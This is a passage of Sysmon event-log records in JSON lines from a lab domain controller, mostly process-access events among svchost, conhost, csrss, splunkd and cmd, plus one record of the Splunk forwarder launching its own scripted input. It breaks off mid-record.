2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-0010B8C20500}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-0010B8C20500}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.984\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-00108FC40500}\r\nProcessId: 876\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.984","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-00108FC40500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-00108FC40500}\r\nTargetProcessId: 876\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-00108FC40500}","TargetProcessId":"876","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-00108FC40500}\r\nTargetProcessId: 876\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-00108FC40500}","TargetProcessId":"876","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdl